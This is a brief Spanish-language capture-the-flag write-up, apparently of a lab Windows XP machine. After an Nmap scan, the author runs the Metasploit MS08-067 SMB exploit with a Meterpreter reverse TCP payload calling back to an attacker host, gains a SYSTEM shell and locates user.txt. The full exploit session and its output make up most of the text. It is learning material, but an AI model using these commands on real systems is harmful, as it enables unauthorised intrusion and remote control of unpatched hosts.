Segunda maquina del día y esta sin ningún tipo de ayuda. Bueno, si un poco, google.
Nmap muestra Smb y XP
googleando literal eso me sale un exploit. “Hack windows xp with MS08-067 exploit”, no puede ser tan fácil no?
msf > use exploit/windows/smb/ms08_067_netapi msf exploit(windows/smb/ms08_067_netapi) > show options Module options (exploit/windows/smb/ms08_067_netapi): Name Current Setting Required Description ---- --------------- -------- ----------- RHOST yes The target address RPORT 445 yes The SMB service port (TCP) SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC) Exploit target: Id Name -- ---- 0 Automatic Targeting msf exploit(windows/smb/ms08_067_netapi) > set rhost 10.10.10.4 msf exploit(windows/smb/ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp msf exploit(windows/smb/ms08_067_netapi) > set lhost 10.10.14.9 lhost => 10.10.14.9 msf exploit(windows/smb/ms08_067_netapi) > run [*] Started reverse TCP handler on 10.10.14.9:4444 [*] 10.10.10.4:445 - Automatically detecting the target... [*] 10.10.10.4:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English [*] 10.10.10.4:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX) [*] 10.10.10.4:445 - Attempting to trigger the vulnerability... [*] Sending stage (179779 bytes) to 10.10.10.4 [*] Meterpreter session 1 opened (10.10.14.9:4444 -> 10.10.10.4:1033) at 2018-05-28 17:44:39 +0100 meterpreter > getuid Server username: NT AUTHORITY\SYSTEM
Done 🙂
meterpreter > search -f user.txt -f Found 1 result... c:\Documents and Settings\john\Desktop\user.txt (32 bytes)